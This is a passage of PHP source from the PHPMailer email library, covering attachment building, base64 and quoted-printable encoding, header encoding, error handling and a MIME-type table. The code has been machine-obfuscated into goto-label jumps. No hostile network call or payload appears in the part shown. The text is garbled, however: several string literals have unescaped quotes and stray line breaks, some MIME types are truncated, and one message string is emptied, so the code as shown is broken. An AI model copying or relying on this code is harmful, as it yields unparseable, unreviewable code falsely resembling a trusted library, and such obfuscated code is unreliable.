attachAll($disposition_type, $boundary) { goto s2Lig; QAzJ3: $mime[] = sprintf("--%s--%s", $boundary, $this->LE); goto h1SBg; s2Lig: $mime = array(); goto pI2Pt; pVFUt: foreach ($this->attachment as $attachment) { goto rEGS3; jgOAZ: a1dX7: goto Ed1is; O0KUv: if (!empty($encoded_name)) { goto L71Fl; } goto PUUMg; UNgMW: $bString = $attachment[5]; goto FoinJ; UH34u: ouvm5: goto L5j1q; iXijA: $type = $attachment[4]; goto Q9IRP; IAQ3H: if (!empty($disposition)) { goto a1dX7; } goto ra8nR; Gy7t5: $mime[] = sprintf("Content-Disposition: %s; filename="%s"%s", $disposition, $encoded_name, $this->LE . $this->LE); goto XG1q8; Ed1is: $encoded_name = $this->encodeHeader($this->secureHeader($name)); goto K7MVe; ul0ky: $string = ''; goto f4H9W; pPp3w: $mime[] = $this->LE . $this->LE; goto izYVu; efHOM: goto Iad1R; goto PBlxg; L5j1q: if ($bString) { goto ZmigP; } goto UxIbq; izYVu: wVWQC: goto XNME5; YFkxm: if (!empty($name)) { goto ZlURs; } goto Zrc3D; FoinJ: if ($bString) { goto UTPIw; } goto l7HUr; f4H9W: $path = ''; goto UNgMW; KKrol: goto Iad1R; goto d51tf; Ruvf8: $inclhash = md5(serialize($attachment)); goto jMRTw; bjUpk: Ppc1n: goto iU_kY; MchXp: if (!($disposition == "inline")) { goto Kryfg; } goto r9pOz; NShWq: $mime[] = sprintf("Content-Transfer-Encoding: %s%s", $encoding, $this->LE); goto HvStl; PBlxg: IJRVn: goto gDksC; HgnQy: if (!$this->isError()) { goto Ppc1n; } goto C1wHc; W7yAM: ZlURs: goto Y_2Wq; bQmYj: goto QPPuw; goto LeNRM; XNME5: vcSAx: goto qmRfm; LidPh: G6EFb: goto Gy7t5; zSuKC: MsA5j: goto ZKdUD; OC9v2: $cidUniq[$cid] = true; goto N8IOb; rEGS3: if (!($attachment[6] == $disposition_type)) { goto vcSAx; } goto ul0ky; aaJLa: $mime[] = sprintf("Content-Disposition: %s; filename=%s%s", $disposition, $encoded_name, $this->LE . $this->LE); goto hrvKY; Q9IRP: $disposition = $attachment[6]; goto eKOPh; UdZll: if (!$this->isError()) { goto FbBVb; } goto IB0BM; mXZ2C: goto ouvm5; goto jgOAZ; gnFxg: goto p5uUf; goto LidPh; XG1q8: p5uUf: goto UH34u; qmRfm: Iad1R: goto lmuqD; Ab580: if (!($disposition == "inline" && array_key_exists($cid, $cidUniq))) { goto E4P79; } goto KKrol; aqDvd: $encoding = $attachment[3]; goto iXijA; M3pRS: $string = $attachment[0]; goto C_8z4; C1wHc: return ''; goto bjUpk; Y_2Wq: $mime[] = sprintf("Content-Type: %s; name="%s"%s", $type, $this->encodeHeader($this->secureHeader($name)), $this->LE); goto zSuKC; Zrc3D: $mime[] = sprintf("Content-Type: %s%s", $type, $this->LE); goto VyUN6; tQsiH: FbBVb: goto pPp3w; PUUMg: $mime[] = sprintf("Content-Disposition: %s%s", $disposition, $this->LE . $this->LE); goto bQmYj; d51tf: E4P79: goto OC9v2; VyUN6: goto MsA5j; goto W7yAM; ZKdUD: if (!($encoding != "7bit")) { goto q2lHX; } goto NShWq; NjOgE: Kryfg: goto IAQ3H; iU_kY: $mime[] = $this->LE . $this->LE; goto SI0Ge; liI8r: UTPIw: goto M3pRS; K7MVe: if (preg_match("/[ \(\)<>@,;:\"\/\[\]\?=]/", $encoded_name)) { goto G6EFb; } goto O0KUv; IB0BM: return ''; goto tQsiH; enPVK: ZmigP: goto UcuR2; C_8z4: q04pp: goto Ruvf8; uG37i: goto q04pp; goto liI8r; N8IOb: $mime[] = sprintf("--%s%s", $boundary, $this->LE); goto YFkxm; UCxSs: $name = $attachment[2]; goto aqDvd; eKOPh: $cid = $attachment[7]; goto Ab580; LeNRM: L71Fl: goto aaJLa; UxIbq: $mime[] = $this->encodeFile($path, $encoding); goto HgnQy; ra8nR: $mime[] = $this->LE; goto mXZ2C; HvStl: q2lHX: goto MchXp; r9pOz: $mime[] = sprintf("Content-ID: <%s>%s", $cid, $this->LE); goto NjOgE; UcuR2: $mime[] = $this->encodeString($string, $encoding); goto UdZll; l7HUr: $path = $attachment[0]; goto uG37i; SI0Ge: goto wVWQC; goto enPVK; hrvKY: QPPuw: goto gnFxg; jMRTw: if (!in_array($inclhash, $incl)) { goto IJRVn; } goto efHOM; gDksC: $incl[] = $inclhash; goto UCxSs; lmuqD: } goto jLXkU; h1SBg: return implode('', $mime); goto UoL5Q; u8b9E: $incl = array(); goto pVFUt; jLXkU: MUsg0: goto QAzJ3; pI2Pt: $cidUniq = array(); goto u8b9E; UoL5Q: } protected function encodeFile($path, $encoding = "base64") { try { goto C692e; UWtXc: ini_set("magic_quotes_runtime", $magic_quotes); goto iruGL; dU0y5: e_jYa: goto fxkG4; NXdYb: nhTX5: goto OTZWx; eX52K: vubee: goto TqFIK; O3Vk_: if (!version_compare(PHP_VERSION, "7.4.0", "<")) { goto NzUFr; } goto OVZHY; C692e: if (!(!self::isPermittedPath($path) or !file_exists($path))) { goto e696H; } goto sfCGX; p_xPg: if (version_compare(PHP_VERSION, "5.3.0", "<")) { goto e_jYa; } goto f_jED; iruGL: goto ibito; goto eX52K; a21ja: if (version_compare(PHP_VERSION, "5.3.0", "<")) { goto vubee; } goto UWtXc; RglMT: ibito: goto P_jWI; TqFIK: set_magic_quotes_runtime($magic_quotes); goto RglMT; am7dd: $magic_quotes = false; goto O3Vk_; sfCGX: throw new phpmailerException($this->lang("file_open") . $path, self::STOP_CONTINUE); goto mOEwS; gYgha: return $file_buffer; goto iVLU0; OTZWx: P7bgw: goto Rsv6m; CfQ2K: $file_buffer = $this->encodeString($file_buffer, $encoding); goto esbF3; f_jED: ini_set("magic_quotes_runtime", false); goto en1Sn; esbF3: if (!$magic_quotes) { goto JMmp1; } goto a21ja; mOEwS: e696H: goto am7dd; Rsv6m: $file_buffer = file_get_contents($path); goto CfQ2K; fxkG4: set_magic_quotes_runtime(false); goto NXdYb; P_jWI: JMmp1: goto gYgha; OVZHY: $magic_quotes = get_magic_quotes_runtime(); goto fJvnu; en1Sn: goto nhTX5; goto dU0y5; fJvnu: NzUFr: goto USHyY; USHyY: if (!$magic_quotes) { goto P7bgw; } goto p_xPg; iVLU0: } catch (Exception $exc) { $this->setError($exc->getMessage()); return ''; } } public function encodeString($str, $encoding = "base64") { goto A8lbi; JN2jk: Xgat0: goto IbiwT; ZomFO: return $encoded; goto xmwDv; IbiwT: mnrSC: goto ZomFO; A8lbi: $encoded = ''; goto BGK43; BGK43: switch (strtolower($encoding)) { case "base64": $encoded = chunk_split(base64_encode($str), 76, $this->LE); goto mnrSC; case "7bit": case "8bit": goto TlS1J; cNazp: eWR7u: goto YqaB_; YqaB_: goto mnrSC; goto a91Gg; aZyTx: if (!(substr($encoded, -strlen($this->LE)) != $this->LE)) { goto eWR7u; } goto EeGDm; EeGDm: $encoded .= $this->LE; goto cNazp; TlS1J: $encoded = $this->fixEOL($str); goto aZyTx; a91Gg: case "binary": $encoded = $str; goto mnrSC; case "quoted-printable": $encoded = $this->encodeQP($str); goto mnrSC; default: $this->setError($this->lang("encoding") . $encoding); goto mnrSC; } goto JN2jk; xmwDv: } public function encodeHeader($str, $position = "text") { goto c8eW7; X8Hsx: if ($matchcount > strlen($str) / 3) { goto asFkE; } goto p8OfV; XLLG6: $maxlen = 75 - 7 - strlen($this->CharSet); goto X8Hsx; r3x1V: $encoded = base64_encode($str); goto m6QUu; vKdVZ: $encoded = preg_replace("/^(.*)$/m", " =?" . $this->CharSet . "?{$encoding}?\1?=", $encoded); goto pLDvp; hWqUv: if (!($matchcount == 0)) { goto dD8sJ; } goto SWhn3; m6QUu: $maxlen -= $maxlen % 4; goto e3Cs6; NbLIf: if (function_exists("mb_strlen") && $this->hasMultiBytes($str)) { goto y8cqb; } goto r3x1V; WYyCK: $encoded = $this->encodeQ($str, $position); goto GH09k; SWhn3: return $str; goto OBP29; hNNYg: asFkE: goto xc_0F; zd9Kg: SgQ56: goto hWqUv; qB32F: iOhN4: goto vKdVZ; mztd_: Hk9HN: goto qB32F; GH09k: $encoded = $this->wrapText($encoded, $maxlen, true); goto YkhGA; tCWqh: switch (strtolower($position)) { case "phrase": goto a2Yd6; r2dgL: goto BVLAI; goto YKRdd; z2hGq: $matchcount = preg_match_all("/[^\040\041\043-\133\135-\176]/", $str, $matches); goto g6mlu; YKRdd: xZ3Pp: goto mK1eK; u2Rwo: DYhQI: goto z2hGq; g6mlu: goto SgQ56; goto eIu90; Ng9BY: return ""{$encoded}""; goto r2dgL; q10Dh: if ($str == $encoded && !preg_match("/[^A-Za-z0-9!#$%&'*+\/=?^_`{|}~ -]/", $str)) { goto xZ3Pp; } goto Ng9BY; vkJPF: BVLAI: goto u2Rwo; mK1eK: return $encoded; goto vkJPF; a2Yd6: if (preg_match("/[\200-\377]/", $str)) { goto DYhQI; } goto s54Fe; s54Fe: $encoded = addcslashes($str, "\x0..\x1f\177\""); goto q10Dh; eIu90: case "comment": $matchcount = preg_match_all("/[()"]/", $str, $matches); case "text": default: $matchcount += preg_match_all("/[\000-\010\013\014\016-\037\177-\377]/", $str, $matches); goto SgQ56; } goto Xr2FP; YkhGA: $encoded = str_replace("=" . self::CRLF, "
", trim($encoded)); goto n0my0; ezQGc: y8cqb: goto LwmjV; p8OfV: $encoding = "Q"; goto WYyCK; e3Cs6: $encoded = trim(chunk_split($encoded, $maxlen, "
")); goto dY5HC; dY5HC: goto Hk9HN; goto ezQGc; OBP29: dD8sJ: goto XLLG6; fq7zh: return $encoded; goto Bwc96; n0my0: goto iOhN4; goto hNNYg; Xr2FP: AxUUc: goto zd9Kg; c8eW7: $matchcount = 0; goto tCWqh; pLDvp: $encoded = trim(str_replace("
", $this->LE, $encoded)); goto fq7zh; xc_0F: $encoding = "B"; goto NbLIf; LwmjV: $encoded = $this->base64EncodeWrapMB($str, "
"); goto mztd_; Bwc96: } public function hasMultiBytes($str) { goto E5FNo; qkj3o: return false; goto aTaBV; VauAj: aOOWl: goto xK12n; aTaBV: goto ig9B3; goto VauAj; ZuwBB: ig9B3: goto oC1Dn; xK12n: return strlen($str) > mb_strlen($str, $this->CharSet); goto ZuwBB; E5FNo: if (function_exists("mb_strlen")) { goto aOOWl; } goto qkj3o; oC1Dn: } public function has8bitChars($text) { return (bool) preg_match("/[\x80-\xFF]/", $text); } public function base64EncodeWrapMB($str, $linebreak = null) { goto YcVWs; dCATo: if (!($linebreak === null)) { goto gG2Ym; } goto tByzp; YcVWs: $start = "=?" . $this->CharSet . "?B?"; goto JyAqZ; vc0Fl: $chunk = mb_substr($str, $i, $offset, $this->CharSet); goto hJX3F; SmHHo: kndvk: goto I38ZV; Rl2aw: $encoded = ''; goto dCATo; UFO2U: $lookBack++; goto ef9aM; yfqvP: xZdqo: goto oP25c; hJX3F: $chunk = base64_encode($chunk); goto UFO2U; RjbEa: $mb_length = mb_strlen($str, $this->CharSet); goto vSaF0; A1mPe: $lookBack = 0; goto UKfUw; ylnn7: $encoded = substr($encoded, 0, -strlen($linebreak)); goto tZbkl; vSaF0: $length = 75 - strlen($start) - strlen($end); goto gfVDJ; WLgET: $encoded .= $chunk . $linebreak; goto yfqvP; O_Cae: gG2Ym: goto RjbEa; vuEPG: e5x88: goto ylnn7; onQBO: $avgLength = floor($length * $ratio * 0.75); goto EUkRV; ef9aM: if (strlen($chunk) > $length) { goto RrYMD; } goto jFXPg; JYoS6: $offset = $avgLength - $lookBack; goto vc0Fl; UKfUw: RrYMD: goto JYoS6; FXzPl: goto kndvk; goto vuEPG; gfVDJ: $ratio = $mb_length / strlen($str); goto onQBO; I38ZV: if (!($i < $mb_length)) { goto e5x88; } goto A1mPe; JyAqZ: $end = "?="; goto Rl2aw; EUkRV: $i = 0; goto SmHHo; tByzp: $linebreak = $this->LE; goto O_Cae; tZbkl: return $encoded; goto F7y2_; oP25c: $i += $offset; goto FXzPl; jFXPg: QokIg: goto WLgET; F7y2_: } public function encodeQP($string, $line_max = 76) { goto iFgbr; VfAsz: $string = str_replace(array("%20", "%0D%0A.", "%0D%0A", "%"), array(" ", "
=2E", "\xd
", "="), rawurlencode($string)); goto E69JA; GXVKI: Nm2KQ: goto VfAsz; iFgbr: if (!function_exists("quoted_printable_encode")) { goto Nm2KQ; } goto N46fw; N46fw: return quoted_printable_encode($string); goto GXVKI; E69JA: return preg_replace("/[^\r\n]{" . ($line_max - 3) . "}[^=\r\n]{2}/", "$0=
\xa", $string); goto V2JqY; V2JqY: } public function encodeQPphp($string, $line_max = 76, $space_conv = false) { return $this->encodeQP($string, $line_max); } public function encodeQ($str, $position = "text") { goto h4Ld7; Mw6Lb: Xu7V1: goto OytF2; d6UhM: $matches = array(); goto R82RD; R82RD: if (!preg_match_all("/[{$pattern}]/", $encoded, $matches)) { goto DNQ0w; } goto Noi4B; XJj60: if (!(false !== $eqkey)) { goto Xu7V1; } goto OiV_I; Noi4B: $eqkey = array_search("=", $matches[0]); goto XJj60; OHlWi: DNQ0w: goto iBD5e; P2OFt: $encoded = str_replace(array("\xd", "\xa"), '', $str); goto s0paU; OytF2: foreach (array_unique($matches[0]) as $char) { $encoded = str_replace($char, "=" . sprintf("%02X", ord($char)), $encoded); t5G4y: } goto oN9yC; i08e6: JK0_8: goto d6UhM; XsvkS: array_unshift($matches[0], "="); goto Mw6Lb; h4Ld7: $pattern = ''; goto P2OFt; xpHvf: CNOFL: goto i08e6; oN9yC: EYTpx: goto OHlWi; s0paU: switch (strtolower($position)) { case "phrase": $pattern = "^A-Za-z0-9!*+\/ -"; goto JK0_8; case "comment": $pattern = "\(\)""; case "text": default: $pattern = "\000-\011\013\014\016-\037\075\077\137\177-\377" . $pattern; goto JK0_8; } goto xpHvf; OiV_I: unset($matches[0][$eqkey]); goto XsvkS; iBD5e: return str_replace(" ", "_", $encoded); goto j6Slo; j6Slo: } public function addStringAttachment($string, $filename, $encoding = "base64", $type = '', $disposition = "attachment") { goto QELij; zjcgD: lSmyv: goto diWLo; QELij: if (!($type == '')) { goto lSmyv; } goto c85ad; c85ad: $type = self::filenameToType($filename); goto zjcgD; diWLo: $this->attachment[] = array(0 => $string, 1 => $filename, 2 => basename($filename), 3 => $encoding, 4 => $type, 5 => true, 6 => $disposition, 7 => 0); goto SWW7V; SWW7V: } public function addEmbeddedImage($path, $cid, $name = '', $encoding = "base64", $type = '', $disposition = "inline") { goto JKVzm; JKVzm: if (!(!self::isPermittedPath($path) or !@is_file($path))) { goto SGyqV; } goto TXXr8; Z2OJA: u2xPN: goto vLn4M; s92mP: UpbBR: goto q1a4x; q1a4x: $this->attachment[] = array(0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => $disposition, 7 => $cid); goto RR96D; vLn4M: $filename = basename($path); goto ojeIv; Yc82C: if (!($type == '')) { goto u2xPN; } goto SYbVF; TXXr8: $this->setError($this->lang("file_access") . $path); goto Tifc5; Tifc5: return false; goto xPkZ7; ojeIv: if (!($name == '')) { goto UpbBR; } goto r9Dus; SYbVF: $type = self::filenameToType($path); goto Z2OJA; r9Dus: $name = $filename; goto s92mP; RR96D: return true; goto HQYmd; xPkZ7: SGyqV: goto Yc82C; HQYmd: } public function addStringEmbeddedImage($string, $cid, $name = '', $encoding = "base64", $type = '', $disposition = "inline") { goto tBXlW; NIeqz: dj0lQ: goto TVNTw; CiTa9: return true; goto RJWO1; TVNTw: $this->attachment[] = array(0 => $string, 1 => $name, 2 => $name, 3 => $encoding, 4 => $type, 5 => true, 6 => $disposition, 7 => $cid); goto CiTa9; IJgNd: $type = self::filenameToType($name); goto NIeqz; tBXlW: if (!($type == '' and !empty($name))) { goto dj0lQ; } goto IJgNd; RJWO1: } public function inlineImageExists() { goto hXRfO; ZEfKQ: Xpz8f: goto kEM2F; hXRfO: foreach ($this->attachment as $attachment) { goto FURaF; miP_Y: q1zLz: goto QxBVx; KC3IJ: return true; goto LnSEn; LnSEn: X_nkQ: goto miP_Y; FURaF: if (!($attachment[6] == "inline")) { goto X_nkQ; } goto KC3IJ; QxBVx: } goto ZEfKQ; kEM2F: return false; goto fp3mF; fp3mF: } public function attachmentExists() { goto AlOOF; AlOOF: foreach ($this->attachment as $attachment) { goto w0Rep; G4lhm: return true; goto HAXyt; w0Rep: if (!($attachment[6] == "attachment")) { goto TvWGN; } goto G4lhm; JiguS: pwk6a: goto fZ3IC; HAXyt: TvWGN: goto JiguS; fZ3IC: } goto Q9Lb7; Q9Lb7: l5Grv: goto YJvxS; YJvxS: return false; goto ZRClr; ZRClr: } public function alternativeExists() { return !empty($this->AltBody); } public function clearQueuedAddresses($kind) { goto buGKj; OHUIx: XfLeN: goto OEO6v; buGKj: $RecipientsQueue = $this->RecipientsQueue; goto O_n1u; O_n1u: foreach ($RecipientsQueue as $address => $params) { goto PxGKE; PxGKE: if (!($params[0] == $kind)) { goto qasrS; } goto u3u6i; N3voU: G2c__: goto KkukQ; u3u6i: unset($this->RecipientsQueue[$address]); goto HwCj4; HwCj4: qasrS: goto N3voU; KkukQ: } goto OHUIx; OEO6v: } public function clearAddresses() { goto qIQcf; jwcO7: $this->clearQueuedAddresses("to"); goto bwF8s; yVfh0: $this->to = array(); goto jwcO7; ASeAE: hOKg8: goto yVfh0; qIQcf: foreach ($this->to as $to) { unset($this->all_recipients[strtolower($to[0])]); DZtsU: } goto ASeAE; bwF8s: } public function clearCCs() { goto cOZhz; OMh2U: $this->cc = array(); goto Bra0S; Bra0S: $this->clearQueuedAddresses("cc"); goto cRrbM; cOZhz: foreach ($this->cc as $cc) { unset($this->all_recipients[strtolower($cc[0])]); UHCQ3: } goto NGazJ; NGazJ: s2z8k: goto OMh2U; cRrbM: } public function clearBCCs() { goto RlYJ3; q6rd2: $this->bcc = array(); goto c10hp; c10hp: $this->clearQueuedAddresses("bcc"); goto BYWf7; NK2DU: JY2sm: goto q6rd2; RlYJ3: foreach ($this->bcc as $bcc) { unset($this->all_recipients[strtolower($bcc[0])]); Pm68T: } goto NK2DU; BYWf7: } public function clearReplyTos() { $this->ReplyTo = array(); $this->ReplyToQueue = array(); } public function clearAllRecipients() { goto HKOXl; OaJay: $this->cc = array(); goto JCoNE; HKOXl: $this->to = array(); goto OaJay; OeDtM: $this->RecipientsQueue = array(); goto h69fM; wJuvN: $this->all_recipients = array(); goto OeDtM; JCoNE: $this->bcc = array(); goto wJuvN; h69fM: } public function clearAttachments() { $this->attachment = array(); } public function clearCustomHeaders() { $this->CustomHeader = array(); } protected function setError($msg) { goto sL9is; DbF7R: if (!($this->Mailer == "smtp" and !is_null($this->smtp))) { goto lbuT5; } goto qYBRD; LXMmB: if (empty($lasterror["smtp_code_ex"])) { goto hR2ID; } goto lv8gS; hdm4M: QnncS: goto LXMmB; lNwsm: if (empty($lasterror["detail"])) { goto wts51; } goto R8uSV; pBD1e: $msg .= " SMTP code: " . $lasterror["smtp_code"]; goto hdm4M; lv8gS: $msg .= " Additional SMTP info: " . $lasterror["smtp_code_ex"]; goto iLkuM; sL9is: $this->error_count++; goto DbF7R; DSLlr: if (empty($lasterror["smtp_code"])) { goto QnncS; } goto pBD1e; C3Rab: lbuT5: goto EZH1G; wCYI1: $msg .= $this->lang("smtp_error") . $lasterror["error"]; goto lNwsm; mKdKh: g7U1B: goto C3Rab; EZH1G: $this->ErrorInfo = $msg; goto doUFr; FqPlu: if (empty($lasterror["error"])) { goto g7U1B; } goto wCYI1; qYBRD: $lasterror = $this->smtp->getError(); goto FqPlu; R8uSV: $msg .= " Detail: " . $lasterror["detail"]; goto sKsPC; iLkuM: hR2ID: goto mKdKh; sKsPC: wts51: goto DSLlr; doUFr: } public static function rfcDate() { date_default_timezone_set(@date_default_timezone_get()); return date("D, j M Y H:i:s O"); } protected function serverHostname() { goto rhKk_; rhKk_: $result = "localhost.localdomain"; goto cf6eF; wnOBc: $result = $_SERVER["SERVER_NAME"]; goto Nt36v; U_wWQ: if (isset($_SERVER) and array_key_exists("SERVER_NAME", $_SERVER) and !empty($_SERVER["SERVER_NAME"])) { goto bUe1_; } goto UNyTk; klQJE: if (php_uname("n") !== false) { goto oxdS_; } goto fbJl8; Nt36v: goto WgY1X; goto s9u3v; BFf0m: WgY1X: goto zYZCb; hNLja: goto WgY1X; goto XTOoG; s9u3v: ePFV1: goto NNbxj; XTOoG: oxdS_: goto bcWKi; UNyTk: if (function_exists("gethostname") && gethostname() !== false) { goto ePFV1; } goto klQJE; fbJl8: goto WgY1X; goto Fz2aV; gZJJP: goto WgY1X; goto HvS7L; bcWKi: $result = php_uname("n"); goto BFf0m; NNbxj: $result = gethostname(); goto hNLja; cf6eF: if (!empty($this->Hostname)) { goto mU9Nq; } goto U_wWQ; C90e0: $result = $this->Hostname; goto gZJJP; Fz2aV: mU9Nq: goto C90e0; HvS7L: bUe1_: goto wnOBc; zYZCb: return $result; goto vhapT; vhapT: } protected function lang($key) { goto lOzw5; f_2CH: qxiZd: goto lZi7K; EUjWe: H_fZD: goto E5Fxp; lOzw5: if (!(count($this->language) < 1)) { goto H_fZD; } goto pn4Jh; px3l2: BHvCf: goto ou3Bz; ou3Bz: if (!($key == "smtp_connect_failed")) { goto h5It7; } goto T6TFK; sG_vl: return $this->language[$key]; goto f_2CH; E5Fxp: if (array_key_exists($key, $this->language)) { goto BHvCf; } goto zphN_; zphN_: return $key; goto hpnEC; pn4Jh: $this->setLanguage("en"); goto EUjWe; hpnEC: goto qxiZd; goto px3l2; E3UjN: h5It7: goto sG_vl; T6TFK: return $this->language[$key] . ""; goto E3UjN; lZi7K: } public function isError() { return $this->error_count > 0; } public function fixEOL($str) { goto yW3Iu; IvorX: if (!($this->LE !== "
")) { goto waXiP; } goto vr8rS; vmgFF: waXiP: goto pVPZh; pVPZh: return $nstr; goto I1Zbt; yW3Iu: $nstr = str_replace(array("\xd\xa", "\xd"), "\xa", $str); goto IvorX; vr8rS: $nstr = str_replace("
", $this->LE, $nstr); goto vmgFF; I1Zbt: } public function addCustomHeader($name, $value = null) { goto tsF2V; IA8YX: $this->CustomHeader[] = explode(":", $name, 2); goto D1aWT; J1TVm: Xn6bY: goto IA8YX; tsF2V: if ($value === null) { goto Xn6bY; } goto rXpFG; D1aWT: DAuR_: goto nwXZV; rXpFG: $this->CustomHeader[] = array($name, $value); goto jAqvT; jAqvT: goto DAuR_; goto J1TVm; nwXZV: } public function getCustomHeaders() { return $this->CustomHeader; } public function msgHTML($message, $basedir = '', $advanced = false) { goto Yzs4M; dAlcJ: foreach ($images[2] as $imgindex => $url) { goto Rpcjn; Yu9Gj: $data = base64_decode($data); goto Sy4h2; UasVB: goto I8rGD; goto bDp21; Nsz2v: $message = preg_replace("/" . $images[1][$imgindex] . "=["']" . preg_quote($url, "/") . "["']/Ui", $images[1][$imgindex] . "="cid:" . $cid . """, $message); goto GTq3p; vyf2P: $cid = md5($url) . "@phpmailer.0"; goto ZfKaW; ZfKaW: if (!(strlen($directory) > 1 && substr($directory, -1) != "/")) { goto vnEqj; } goto qMqUF; qMqUF: $directory .= "/"; goto pL0oU; pL0oU: vnEqj: goto PEL28; Hqxz_: $data = substr($url, strpos($url, ",")); goto NKXNJ; Zlcog: goto onpLq; goto gTDXC; GTq3p: kTljc: goto dQ4FH; o8mLn: if (!$this->addStringEmbeddedImage($data, $cid, "embed" . $imgindex, "base64", $match[1])) { goto j4cey; } goto bj9Fe; dwuKd: $data = rawurldecode($data); goto Zlcog; NKXNJ: if ($match[2]) { goto PGvjS; } goto dwuKd; Rpcjn: if (!preg_match("#^data:(image[^;,]*)(;base64)?,#", $url, $match)) { goto O_tTt; } goto Hqxz_; tpII5: $filename = basename($url); goto PHyF_; lWcm7: I8rGD: goto af1NI; yMyXE: j4cey: goto UasVB; PHyF_: $directory = dirname($url); goto PcrAA; Sy4h2: onpLq: goto zDMEK; cGLdV: yD1ET: goto vyf2P; kUv5K: if (!(!empty($basedir) && strpos($url, "..") === false && substr($url, 0, 4) !== "cid:" && !preg_match("#^[a-z][a-z0-9+.-]*:?//#i", $url))) { goto MLkeG; } goto tpII5; bj9Fe: $message = str_replace($images[0][$imgindex], $images[1][$imgindex] . "="cid:" . $cid . """, $message); goto yMyXE; bDp21: O_tTt: goto kUv5K; PEL28: if (!$this->addEmbeddedImage($basedir . $directory . $filename, $cid, $filename, "base64", self::_mime_types((string) self::mb_pathinfo($filename, PATHINFO_EXTENSION)))) { goto kTljc; } goto Nsz2v; dQ4FH: MLkeG: goto lWcm7; PcrAA: if (!($directory == ".")) { goto yD1ET; } goto r8SuE; gTDXC: PGvjS: goto Yu9Gj; zDMEK: $cid = md5($url) . "@phpmailer.0"; goto o8mLn; r8SuE: $directory = ''; goto cGLdV; af1NI: } goto P00OM; ZDx6t: ZdDSk: goto mRXO_; H5F_D: if ($this->alternativeExists()) { goto ZdDSk; } goto d2ow2; P00OM: L_pIT: goto yKu8I; Yzs4M: preg_match_all("/(src|background)=["'](.*)["']/Ui", $message, $images); goto IeQ5N; IeQ5N: if (!array_key_exists(2, $images)) { goto bu1iR; } goto BjOJW; fidJs: $this->Body = $this->normalizeBreaks($message); goto Wt7kG; c0KlK: Elpon: goto dAlcJ; o0u1K: $this->isHTML(true); goto fidJs; yKu8I: bu1iR: goto o0u1K; Wt7kG: $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced)); goto H5F_D; mRXO_: return $this->Body; goto XSAkZ; d2ow2: $this->AltBody = "To view this email message, open it in a program that understands HTML!" . self::CRLF . self::CRLF; goto ZDx6t; spAtp: $basedir .= "/"; goto c0KlK; BjOJW: if (!(strlen($basedir) > 1 && substr($basedir, -1) != "/")) { goto Elpon; } goto spAtp; XSAkZ: } public function html2text($html, $advanced = false) { goto Lxq9Y; Lxq9Y: if (!is_callable($advanced)) { goto I_wNx; } goto pQXJH; xgmz6: I_wNx: goto T_9XY; T_9XY: return html_entity_decode(trim(strip_tags(preg_replace("/<(head|title|style|script)[^>]*>.*?<\/\1>/si", '', $html))), ENT_QUOTES, $this->CharSet); goto JPAXA; pQXJH: return call_user_func($advanced, $html); goto xgmz6; JPAXA: } public static function _mime_types($ext = '') { goto s7m_O; s7m_O: $mimes = array("xl" => "application/excel", "js" => "application/javascript", "hqx" => "application/mac-binhex40", "cpt" => "application/mac-compactpro", "bin" => "application/macbinary", "doc" => "application/msword", "word" => "application/msword", "xlsx" => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", "xltx" => "application/vnd.openxmlformats-officedocument.spreadsheetml.template", "potx" => "application/vnd.openxmlformats-officedocument.presentationml.template", "ppsx" => "application/vnd.openxmlformats-officedocument.presentationml.slideshow", "pptx" => "application/vnd.openxmlformats-officedocument.presentationml.presentation", "sldx" => "application/vnd.openxmlformats-officedocument.presentationml.slide", "docx" => "application/vnd.openxmlformats-officedocument.wordprocessingml.document", "dotx" => "application/vnd.openxmlformats-officedocument.wordprocessingml.template", "xlam" => "application/", "xlsb" => "application/", "class" => "application/octet-stream", "dll" => "application/octet-stream", "dms" => "application/octet-stream", "exe" => "application/octet-stream", "lha" => "application/octet-stream", "lzh" => "application/octet-stream", "psd" => "application/octet-stream", "sea" => "application/octet-stream", "so" => "application/octet-stream", "oda" => "application/oda", "pdf" => "application/pdf", "ai" => "application/postscript", "eps" => "application/postscript", "ps" => "application/postscript", "smi" => "application/smil", "smil" => "application/smil", "mif" => "application/vnd.mif", "xls" => "application/", "ppt" => "application/", "wbxml" => "application/vnd.wap.wbxml", "wmlc" => "application/vnd.wap.wmlc", "dcr" => "application/x-director", "dir" => "application/x-director", "dxr" => "application/x-director", "dvi" => "application/x-dvi", "gtar" => "application/x-gtar", "php3" => "application/x-httpd-php", "php4" => "application/x-httpd-php", "php" => "application/x-httpd-php", "phtml" => "application/x-httpd-php", "phps" => "application/x-httpd-php-source", "swf" => "application/x-shockwave-flash", "sit" => "application/x-stuffit", "tar" => "application/x-tar", "tgz" => "application/x-tar", "xht" => "application/xhtml+xml", "xhtml" => "application/xhtml+xml", "zip" => "application/zip", "mid" => "audio/midi", "midi" => "audio/midi", "mp2" => "audio/mpeg", "mp3" => "audio/mpeg", "mpga" => "audio/mpeg", "aif" => "audio/x-aiff", "aifc" => "audio/x-aiff", "aiff" => "audio/x-aiff", "ram" => "audio/x-pn-realaudio", "rm" => "audio/x-pn-realaudio", "rpm" => "audio/x-pn-realaudio-plugin", "ra" => "audio/x-realaudio", "wav" => "audio/x-wav", "bmp" => "image/bmp", "gif" => "image/gif", "jpeg" => "image/jpeg", "jpe" => "image/jpeg", "jpg" => "image/jpeg", "png" => "image/png", "tiff" => "image/tiff", "tif" => "image/tiff", "eml" => "message/rfc822", "css" => "text/css", "html" => "text/html", "htm" => "text/html", "shtml" => "text/html", "log" => "text/plain", "text" => "text/plain", "txt" => "text/plain", "rtx" => "text/richtext", "rtf" => "text/rtf", "vcf" => "text/vcard", "vcard" => "text/vcard", "xml" => "text/xml", "xsl" => "text/xml", "mpeg" => "video/mpeg", "mpe" => "video/mpeg", "mpg" => "video/mpeg", "mov" => "video/quicktime", "qt" => "video/quicktime", "rv" => "video/vnd.rn-realvideo", "avi" => "video/x-msvideo", "movie" => "video/x-sgi-movie"); goto j2KTi; j2KTi: if (!array_key_exists(strtolower($ext), $mimes)) { goto Lhz2v; } goto otYtB; q3XeJ: return "application/octet-stream"; goto FKYej; otYtB: return $mimes[strtolower($ext)]; goto xZhit; xZhit: Lhz2v: goto q3XeJ; FKYej: } public static function filenameToType($filename) { goto Q2hUJ; Q2hUJ: $qpos = strpos($filename, "?"); goto iAc2q; HugKM: $pathinfo = self::mb_pathinfo($filename); goto bTJLX; bTJLX: return self::_mime_types($pathinfo["extension"]); goto DIzeu; iAc2q: if (!(false !== $qpos)) { goto 